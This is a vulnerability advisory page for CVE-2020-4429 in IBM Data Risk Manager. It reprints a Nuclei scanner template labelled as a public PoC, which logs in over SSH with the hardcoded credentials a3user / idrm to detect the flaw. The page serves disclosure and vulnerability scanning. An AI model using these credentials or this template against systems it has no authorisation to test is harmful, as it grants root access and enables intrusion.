CVE-2020-4429: IBM Data Risk Manager - Hardcoded Credentials

日期: 2025-08-01 | 影响软件: IBM Data Risk Manager | POC: 已公开

漏洞描述

IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, and 2.0.6 contains a default password for an IDRM administrative account. A remote attacker could exploit this vulnerability to login and execute arbitrary code on the system with root privileges. IBM X-Force ID- 180534.

PoC代码[已公开]

id: CVE-2020-4429

info:
  name: IBM Data Risk Manager - Hardcoded Credentials
  author: Kazgangap
  severity: critical
  description: |
    IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, and 2.0.6 contains a default password for an IDRM administrative account. A remote attacker could exploit this vulnerability to login and execute arbitrary code on the system with root privileges. IBM X-Force ID- 180534.
  impact: |
    Remote attackers can gain root access and execute arbitrary code, potentially leading to complete system compromise.
  remediation: |
    Change default passwords and update to the latest version if available.
  reference:
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/180534
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/ssh/ibm_drm_a3user.rb
    - https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-4429
    cwe-id: CWE-798
    epss-score: 0.80629
    epss-percentile: 0.99088
    cpe: cpe:2.3:a:ibm:data_risk_manager:2.0.1:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 1
    vendor: ibm
    product: data_risk_manager
  tags: cve,cve2020,ibm,default-login,vkev

javascript:
  - pre-condition: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      var response = c.ConnectSSHInfoMode(Host, Port);
      response["UserAuth"].includes("password")

    code: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      c.Connect(Host,Port,Username,Password);

    args:
      Host: "{{Host}}"
      Port: "22"
      Username: "a3user"
      Password: "idrm"

    matchers:
      - type: dsl
        dsl:
          - "response == true"
          - "success == true"
        condition: and
# digest: 4a0a00473045022100abaf65e415bebef66e6b5741714a821f270d3d9436987e9891db66215ea5e17502202b837fd943134c24166ef76829378cbfc0cfabf93af4b332e526746bd8ec68b7:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/cves/2020/CVE-2020-4429.yaml

相关漏洞推荐